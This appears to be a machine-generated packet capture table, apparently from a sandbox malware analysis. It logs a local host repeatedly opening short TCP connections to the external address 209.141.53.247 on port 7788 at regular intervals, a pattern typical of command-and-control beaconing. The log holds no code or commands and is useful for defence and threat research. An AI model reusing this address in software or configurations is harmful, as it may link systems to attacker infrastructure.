Jul 2, 2024 18:14:01.989254951 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:01.992224932 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:01.997330904 CEST	7788	44592	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:03.605109930 CEST	7788	44592	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:03.605549097 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:03.607228041 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:03.612313032 CEST	7788	44592	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:03.618751049 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:03.624008894 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:03.624073029 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:03.626909018 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:03.631767988 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:05.227231979 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:05.229065895 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:05.236022949 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:05.244391918 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:05.249136925 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:05.249221087 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:05.251703978 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:05.256501913 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:06.854420900 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:06.856543064 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:06.861387968 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:06.869036913 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:06.873999119 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:06.874094963 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:06.877059937 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:06.881839991 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:08.485796928 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:08.488012075 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:08.492851019 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:08.499753952 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:08.504488945 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:08.504543066 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:08.506943941 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:08.511898994 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:10.100090981 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:10.101249933 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:10.102193117 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:10.106964111 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:10.113831043 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:10.118643999 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:10.118701935 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:10.121613026 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:10.126368046 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:11.729518890 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:11.731570005 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:11.736489058 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:11.742866039 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:11.747651100 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:11.747724056 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:11.750206947 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:11.755033016 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:13.335649967 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:13.337138891 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:13.338615894 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:13.344291925 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:13.351700068 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:13.358936071 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:13.359025955 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:13.361931086 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:13.367449045 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:14.945147991 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:14.948106050 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:14.952905893 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:14.959717989 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:14.964620113 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:14.964680910 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:14.967263937 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:14.972157955 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:16.584275007 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:16.585050106 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:16.587779045 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:16.592761040 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:16.600600004 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:16.605598927 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:16.605665922 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:16.608973026 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:16.614257097 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:18.211905956 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:18.212918997 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:18.213943958 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:18.218669891 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:18.225883961 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:18.230664968 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:18.230721951 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:18.232633114 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:18.237462044 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:19.840675116 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:19.840972900 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:19.842709064 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:19.847445965 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:19.857803106 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:19.862657070 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:19.862710953 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:19.864839077 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:19.869659901 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:21.460588932 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:21.460927010 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:21.462265015 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:21.467113018 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:21.474284887 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:21.479074001 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:21.479156017 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:21.484958887 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:21.489778996 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:23.237849951 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:23.240758896 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:23.241022110 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:23.245750904 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:23.252114058 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:23.256993055 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:23.257070065 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:23.262871027 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:23.270520926 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:24.854644060 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:24.856662035 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:24.857503891 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:24.862294912 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:24.870564938 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:24.875423908 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:24.875516891 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:24.877434969 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:24.882472992 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:26.475677967 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:26.476602077 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:26.477370024 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:26.482861996 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:26.489432096 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:26.494196892 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:26.494256020 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:26.496304989 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:26.501128912 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:28.092539072 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:28.094543934 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:28.099953890 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:28.105335951 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:28.115176916 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:28.115267038 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:28.117309093 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:28.123466015 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:29.713922977 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:29.715564013 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:29.723705053 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:29.732486010 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:29.740138054 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:29.740291119 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:29.742460966 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:29.750802040 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:31.358163118 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:31.360421896 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:31.361110926 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:31.366600037 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:31.374490023 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:31.380517960 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:31.380594969 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:31.386954069 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:31.391853094 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:32.972347021 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:32.975543976 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:32.980361938 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:32.989113092 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:32.994157076 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:32.994234085 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:32.996234894 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:33.001526117 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:35.362950087 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:35.364274025 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:35.365519047 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:35.365994930 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:35.366049051 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:35.367376089 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:35.367433071 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:35.374634981 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:35.381439924 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:35.386307955 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:35.386380911 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:35.388988972 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:35.393903017 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:36.978190899 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:36.979896069 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:36.984707117 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:36.992697954 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:36.997524023 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:36.997591972 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:37.000092030 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:37.005069971 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:38.588243008 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:38.589891911 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:38.594764948 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:38.600531101 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:38.605633020 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:38.605693102 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:38.607773066 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:38.612593889 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:40.217710018 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:40.219494104 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:40.224421978 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:40.231221914 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:40.236112118 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:40.236187935 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:40.238099098 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:40.243063927 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:41.819248915 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:41.820022106 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:41.821306944 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:41.826324940 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:41.832387924 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:41.837189913 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:41.837260008 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:41.839781046 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:41.844599962 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:43.435158014 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:43.435914993 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:43.436820030 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:43.441591978 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:43.448817015 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:43.453664064 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:43.453747034 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:43.457830906 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:43.462704897 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:45.058152914 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:45.059863091 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:45.060735941 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:45.065574884 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:45.077693939 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:45.082473993 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:45.082549095 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:45.085813046 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:45.090562105 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:46.681036949 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:46.682718992 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:46.687747955 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:46.693569899 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:46.698532104 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:46.698606968 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:46.700958014 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:46.705768108 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:48.288716078 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:48.290457010 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:48.295424938 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:48.300391912 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:48.305341005 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:48.305437088 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:48.307192087 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:48.312315941 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:49.919049978 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:49.919704914 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:49.920430899 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:49.925179005 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:49.930377960 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:49.935241938 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:49.935317993 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:49.937470913 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:49.942322969 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:51.529181004 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:51.530956984 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:51.539293051 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:51.544140100 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:51.550482035 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:51.550544024 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:51.552496910 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:51.560667992 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:53.169506073 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:53.171442986 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:53.177611113 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:53.181883097 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:53.188424110 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:53.188493967 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:53.190387011 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:53.195286989 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:54.791685104 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:54.792924881 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:54.797993898 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:54.806852102 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:54.812275887 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:54.812355042 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:54.814740896 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:55.019500971 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:55.080540895 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:55.080555916 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:56.432986975 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:56.434638023 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:56.439960957 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:56.446090937 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:56.450942993 CEST	7788	44658	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:56.451054096 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:56.453413963 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:56.460199118 CEST	7788	44658	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:58.039175034 CEST	7788	44658	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:58.039359093 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:58.041898966 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:58.046606064 CEST	7788	44658	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:58.055090904 CEST	44660	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:58.059887886 CEST	7788	44660	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:58.059973001 CEST	44660	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:58.063611031 CEST	44660	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:58.068458080 CEST	7788	44660	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:59.663661003 CEST	7788	44660	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:59.666312933 CEST	44660	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:59.671369076 CEST	7788	44660	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:59.682210922 CEST	44662	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:59.687179089 CEST	7788	44662	209.141.53.247	192.168.2.14
Jul 2, 2024 18:14:59.687249899 CEST	44662	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:59.691241026 CEST	44662	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:14:59.696095943 CEST	7788	44662	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:01.310128927 CEST	7788	44662	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:01.311208010 CEST	44662	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:01.313992023 CEST	44662	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:01.318759918 CEST	7788	44662	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:01.325089931 CEST	44664	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:01.329859972 CEST	7788	44664	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:01.329931974 CEST	44664	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:01.335645914 CEST	44664	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:01.340467930 CEST	7788	44664	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:02.913294077 CEST	7788	44664	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:02.915116072 CEST	44664	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:02.915936947 CEST	44664	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:02.921689987 CEST	7788	44664	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:02.929171085 CEST	44666	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:02.934649944 CEST	7788	44666	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:02.934698105 CEST	44666	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:02.936906099 CEST	44666	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:02.942229986 CEST	7788	44666	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:04.523281097 CEST	7788	44666	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:04.525190115 CEST	44666	7788	192.168.2.14	209.141.53.247
